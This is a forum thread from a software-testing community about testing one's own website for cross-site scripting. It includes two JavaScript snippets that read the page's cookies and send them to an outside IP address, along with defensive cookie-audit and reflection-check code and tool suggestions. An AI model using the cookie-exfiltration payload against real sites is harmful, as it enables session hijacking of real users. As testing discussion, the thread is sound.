The online community for software testing & quality assurance professionals
 
 
Gaurang_Shah
Advanced Member


Reged: 02/11/08
Posts: 558
Loc: Ahmedabad, India
How to test XSS Vulnerability
      #573637 - 06/09/09 04:09 AM

Hi guys,
I know that just after reading the heading of this post, most people will point me to the threads already in this forum. But guys, I have read all of them, and much other stuff from the net. So by now I know all about XSS.
But the question is: how do I test whether (my) site is vulnerable to this? And I don't mean with any standard tool.

My site lets users post data, and they can also embed JavaScript. So to test the XSS vulnerability I wrote the following code, which will log the user's session in my server's log.
Code:

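<script>
// Build a URL on the tester's own log server with the page's cookies in the path
var adr = 'http://10.101.1.207/' + escape(document.cookie);
// Request that URL so the cookie string shows up in the server's access log
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", adr, true);
xmlhttp.send(adr);
</script>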


Ya ya ya, I know this won't work, as all browsers have the same-origin policy.

Then what the hell is this XSS? On all the sites and forums I read, they say that through this you can easily hijack the session. But I don't think it is that easy. Or is it? I mean, how can I test that?

--------------------
GauranG Shah
I don't make the software, Rather I make it better.
My Blogs:
All About Automation
Spell Checker


Gaurang_Shah
Advanced Member


Reged: 02/11/08
Posts: 558
Loc: Ahmedabad, India
Re: How to test XSS Vulnerability [Re: Gaurang_Shah]
      #573646 - 06/09/09 05:17 AM

Finally I found the solution. I just replaced the code with the following:
Code:

<script>
var req_img = new Image();
req_img.src="http://10.101.1.207/"+document.cookie;
</script>



--------------------
GauranG Shah
I don't make the software, Rather I make it better.
My Blogs:
All About Automation
Spell Checker
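Whether the test in the two posts above actually exposes a session depends on whether the session cookie is visible to `document.cookie` in the first place. As an added example (not part of the original posts), this Node.js sketch parses `Set-Cookie` headers and lists the cookies a script could read because `HttpOnly` is missing; the header lines and function names are constructed for illustration.

```javascript
// Constructed sample Set-Cookie header values (not taken from the thread).
const sampleSetCookie = [
  'PHPSESSID=8f3a2c; Path=/',
  'auth=c2FtcGxl==; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Max-Age=31536000',
  'csrf=ab12; path=/; httponly',
];

// Parse one Set-Cookie value into { name, value, attrs }.
// Attribute names are case-insensitive, so they are lower-cased.
function parseSetCookie(line) {
  const parts = line.split(';').map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || '';
  const eq = first.indexOf('=');      // split on the first '=' only
  if (eq < 1) return null;            // no cookie name: skip the line
  const attrs = {};
  for (const p of parts) {
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1);
  }
  return { name: first.slice(0, eq), value: first.slice(eq + 1), attrs };
}

// One finding per cookie: can page script read it, can it travel over plain HTTP?
function auditCookies(lines) {
  return lines.map(parseSetCookie).filter(Boolean).map((c) => ({
    name: c.name,
    readableByScript: !c.attrs.httponly,
    sentOverPlainHttp: !c.attrs.secure,
  }));
}

// Names of the cookies that document.cookie would return to any script on the page.
function scriptReadableCookies(lines) {
  return auditCookies(lines).filter((c) => c.readableByScript).map((c) => c.name);
}

console.log(scriptReadableCookies(sampleSetCookie));
```

A session cookie that appears in this list is the one to fix first: setting `HttpOnly` on it keeps it out of `document.cookie`, although the injection itself still has to be closed by encoding the output.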


gsp28
Newbie


Reged: 07/06/09
Posts: 4
Re: How to test XSS Vulnerability [Re: Gaurang_Shah]
      #578270 - 07/06/09 04:10 AM

I want to check/test a website developed by our developers in PHP in our localhost environment, for which I need specific feedback and of course the workflow for testing the intended website for XSS, SQL injection, malicious file execution, etc., which come specifically under vulnerability testing.

It would be a really great help (guidelines/procedures on "How to test a website in PHP for XSS threats") if anyone could show a little concern in making my aforesaid activity a success.

Expecting a speedy reply from your side.

Have a Great Day Ahead.

Thanks and regards;
Girija S Parhi.

SQA Tester


tmarshallva
Member


Reged: 02/15/07
Posts: 223
Loc: Virginia, USA
Re: How to test XSS Vulnerability [Re: gsp28]
      #578330 - 07/06/09 07:03 AM

Girija, this should probably have its own topic instead of hijacking this thread.

EDIT- Moved reply to new topic.


--------------------
-Troy
Do or do not... there is no try. -Yoda

Edited by tmarshallva (07/06/09 07:04 AM)


saxenavivek
Newbie


Reged: 09/10/09
Posts: 1
Loc: Bangalore
Re: How to test XSS Vulnerability [Re: tmarshallva]
      #590237 - 09/10/09 06:51 AM

Do we have some iframe-related injection or other injection for the input field?

Or if somebody knows the scripting which we are using for XSS,
please let me know.

--------------------
-------------------------
Vivek
need to improve....


nocountry4bug
Newbie


Reged: 02/26/08
Posts: 5
Re: How to test XSS Vulnerability [Re: saxenavivek]
      #614660 - 02/21/10 07:42 PM

You can use a tool such as Acunetix or the Firefox add-in XSS Me to test XSS.

dbrain
Member


Reged: 03/13/03
Posts: 27
Loc: london
Re: How to test XSS Vulnerability [Re: nocountry4bug]
      #622443 - 04/15/10 06:14 AM

Quote:

You can use a tool such as Acunetix or the Firefox add-in XSS Me to test XSS.




I've found XSS Me to be somewhat useful as well


sekharg4u
Newbie


Reged: 08/28/08
Posts: 22
Re: How to test XSS Vulnerability [Re: Gaurang_Shah]
      #633877 - 07/08/10 04:34 AM

For XSS vulnerability you need to check "the area of the application where the user input is shown back to the user" (all these areas are vulnerable to XSS; check the source code or use proxy tools).
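One way to carry out the check described in the post above, as an added example that is not part of the original thread: submit a harmless probe (a unique marker wrapped around the characters `<"'>`), then inspect the returned page to see where it is echoed and which of those characters came back unencoded. The marker strings, the sample HTML and the function names are constructed, and the context detection is a simple heuristic rather than a full HTML parser.

```javascript
// Constructed probe: unique start/end markers around the characters encoding must neutralise.
const START = 'qa7zx1', END = 'qa7zx2', SPECIAL = `<"'>`;
const PROBE = START + SPECIAL + END;   // the value a tester types into each input field

// Constructed sample response in which the probe is echoed in three places.
const sampleHtml = [
  `<p>Search: qa7zx1&lt;&quot;&#39;&gt;qa7zx2</p>`,
  `<input name="q" value="qa7zx1&lt;"'&gt;qa7zx2">`,
  `<div class="note">qa7zx1<"'>qa7zx2</div>`,
].join('\n');

// Heuristic: decide from the markup before pos whether we are inside a
// <script> block, inside a tag (attribute), or in ordinary HTML text.
function contextAt(html, pos) {
  const before = html.slice(0, pos).toLowerCase();
  if (before.lastIndexOf('<script') > before.lastIndexOf('</script')) return 'script';
  if (before.lastIndexOf('<') > before.lastIndexOf('>')) return 'attribute';
  return 'html-text';
}

// For every echo of the probe, report its context, the special characters that
// came back unencoded, and whether those characters matter in that context.
function findReflections(html) {
  const found = [];
  let pos = html.indexOf(START);
  while (pos !== -1) {
    const end = html.indexOf(END, pos);
    if (end === -1) break;                       // truncated echo: stop scanning
    const echoed = html.slice(pos + START.length, end);
    const unencoded = [...SPECIAL].filter((ch) => echoed.includes(ch)).join('');
    const context = contextAt(html, pos);
    // Characters that end the current context if they are left unencoded.
    const breaksOut = { 'html-text': '<', attribute: `"'`, script: SPECIAL }[context];
    const needsFix = [...breaksOut].some((ch) => unencoded.includes(ch));
    found.push({ context, unencoded, needsFix });
    pos = html.indexOf(START, end);
  }
  return found;
}

console.log(findReflections(sampleHtml));
```

In the sample, the first echo is fully encoded, the second encodes the angle brackets but leaves the quotes that close the attribute, and the third is echoed untouched, so the last two are the output points that need context-appropriate encoding.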

TJLEE
Member


Reged: 05/26/09
Posts: 96
Loc: Russia
Re: How to test XSS Vulnerability [Re: sekharg4u]
      #689347 - 10/21/11 06:24 AM

http://qaquestions.wordpress.com/2011/10/21/xss-pay-attention-to-input-validation/ Here is some intro.

--------------------
Regards
Vasily
Blog: http://qaquestions.wordpress.com/

Twitter: http://twitter.com/pythonkaa


tmpalaniselvam
Veteran


Reged: 09/18/01
Posts: 2511
Loc: Bangalore,India
Re: How to test XSS Vulnerability [Re: TJLEE]
      #694170 - 12/22/11 02:10 AM

Have a look at http://tips-testing.blogspot.com/2008/03/security-testing-css-or-xss.html

--------------------
Thanks & Regards,
Palani.
http://tips-testing.blogspot.com/index.html
Quote: Dont hesitate to initiate!

